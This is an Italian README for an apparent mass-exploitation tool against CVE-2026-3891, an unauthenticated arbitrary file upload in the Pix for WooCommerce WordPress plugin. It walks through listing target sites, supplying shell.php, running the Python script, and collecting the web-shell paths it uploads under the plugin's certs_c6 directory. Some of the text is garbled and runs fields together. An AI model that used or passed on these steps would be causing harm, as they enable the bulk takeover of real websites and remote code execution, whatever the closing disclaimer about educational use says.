
Pix for WooCommerce <= 1.5.0 - Caricamento arbitrario di file non autenticato
Pix for WooCommerce <= 1.5.0 - Caricamento File Arbitrario Non Autenticato
Il plugin Pix for WooCommerce per WordPress è vulnerabile al caricamento di file arbitrario non autenticato a causa di:
nella funzione lkn_pix_for_woocommerce_c6_save_settings in tutte le versioni fino alla 1.5.0 inclusa.
Ciò consente a attaccanti remoti non autenticati di caricare file arbitrari, portando a Remote Code Execution (RCE).
CVE-2026-38919.8 (Critico)CVE-2026-3891.py@Kxploitpip install requests rich
Crea un file:
list.txt
Esempio:
http://example.com
https://target.com
victim-site.com
Se il protocollo manca → lo script aggiunge automaticamente
http://
Metti il file della shell nella stessa directory:
shell.php
python3 CVE-2026-3891.py
Lo script chiederà:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (motivo)
shells.txt
Progress 5/20 OK:3 FAIL:2
Questo progetto è fornito solo per test di sicurezza educativi e autorizzati.
Nxploited